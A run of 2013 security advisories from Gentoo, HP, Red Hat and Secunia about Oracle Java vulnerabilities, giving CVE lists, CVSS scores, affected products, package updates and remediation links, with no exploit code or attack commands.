security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Release Date: 2013-04-29
Last Updated: 2013-04-29
Potential Security Impact: Java Runtime Environment (JRE) security update
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Several potential security vulnerabilities have been identified with HP
Service Manager for Windows, Linux, HP-UX, Solaris and AIX.
References: CVE-2013-1487, CVE-2013-1486,
CVE-2013-1484,CVE-2013-1485,CVE-2013-0169, CVE-2013-0437, CVE-2013-1478,
CVE-2013-0442, CVE-2013-0445, CVE-2013-1480, CVE-2013-0441, CVE-2013-1475,
CVE-2013-1476, CVE-2012-1541, CVE-2013-0446, CVE-2012-3342, CVE-2013-0450,
CVE-2013-1479, CVE-2013-0425, CVE-2013-0426, CVE-2013-0428, CVE-2012-3213,
CVE-2013-1481, CVE-2013-0436, CVE-2013-0439, CVE-2013-0447, CVE-2013-1472,
CVE-2012-4301, CVE-2013-1477, CVE-2013-1482, CVE-2013-1483, CVE-2013-1474,
CVE-2012-4305, CVE-2013-0444, CVE-2013-0429, CVE-2013-0419, CVE-2013-0423,
CVE-2012-1543, CVE-2013-0351, CVE-2013-0430, CVE-2013-0432, CVE-2013-0449,
CVE-2013-1473, CVE-2013-0435, CVE-2013-0434, CVE-2013-0409, CVE-2013-0431,
CVE-2013-0427, CVE-2013-0448, CVE-2013-0433, CVE-2013-0424, CVE-2013-0440,
CVE-2013-0438, CVE-2013-0443, CVE-2013-1489
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Service Manager for Windows, Linux, HP-UX, Solaris and AIX v 9.30, v9.31
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-1543 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-4301 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-4305 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2013-0169 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0430 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9
CVE-2013-0431 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0436 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0437 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0439 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0444 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0447 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0448 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1474 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1477 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1479 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1482 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1483 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1484 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1485 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1486 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1487 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1489 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided an update for Service Manager that updates the JRE to the
latest version, thus eliminating known JRE7-related security vulnerabilities.
Download and install the updates from The HP Software Support Online (SSO).
SM 9.31P2 Server Windows Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00423
HP Itanium Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00420
Linux Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00421
Solaris Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00422
AIX Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00419
SM 9.31P2 Web Tier
Web Tier 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00424
SM 9.31P2 Windows Client
Windows Client 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00425
SM 9.31P2 Knowledge Management
SM 9.31P2 Knowledge Management
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00426
HISTORY
Version:1 (rev.1) - 29 April 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-sun security update
Advisory ID: RHSA-2013:0236-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0236.html
Issue date: 2013-02-04
CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342
CVE-2013-0351 CVE-2013-0409 CVE-2013-0419
CVE-2013-0423 CVE-2013-0424 CVE-2013-0425
CVE-2013-0426 CVE-2013-0427 CVE-2013-0428
CVE-2013-0429 CVE-2013-0430 CVE-2013-0432
CVE-2013-0433 CVE-2013-0434 CVE-2013-0435
CVE-2013-0438 CVE-2013-0440 CVE-2013-0441
CVE-2013-0442 CVE-2013-0443 CVE-2013-0445
CVE-2013-0446 CVE-2013-0450 CVE-2013-1473
CVE-2013-1475 CVE-2013-1476 CVE-2013-1478
CVE-2013-1480 CVE-2013-1481
=====================================================================
1. Summary:
Updated java-1.6.0-sun packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3.
(CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0432,
CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446,
CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478,
CVE-2013-1480, CVE-2013-1481)
All users of java-1.6.0-sun are advised to upgrade to these updated
packages, which provide Oracle Java 6 Update 39. All running instances of
Oracle Java must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906930 - CVE-2013-0430 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Install)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907224 - CVE-2013-1481 Oracle JDK: unspecified vulnerability fixed in 6u39 (Sound)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0429.html
https://www.redhat.com/security/data/cve/CVE-2013-0430.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1475.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1481.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFREE7WXlSAg2UNWIIRAuWTAJ4g2iIk0XnUEpbIXz6nDgDjaHxz7ACbBcjy
gqkoqFew2BZDYA/n817qYO8=
=m5pJ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
3) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
4) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
6) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
7) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
8) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
9) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
10) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
11) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
12) An unspecified error in the JMX component of the client
deployment can be exploited to potentially execute arbitrary code.
13) An unspecified error in the JavaFX component of the client
deployment can be exploited to potentially execute arbitrary code.
14) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
15) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
16) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
17) An unspecified error in the Scripting component of the client
deployment can be exploited to potentially execute arbitrary code.
18) An unspecified error in the Sound component of the client
deployment can be exploited to potentially execute arbitrary code.
19) An unspecified error in the Beans component of the client
deployment can be exploited to potentially execute arbitrary code.
20) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
21) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
22) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
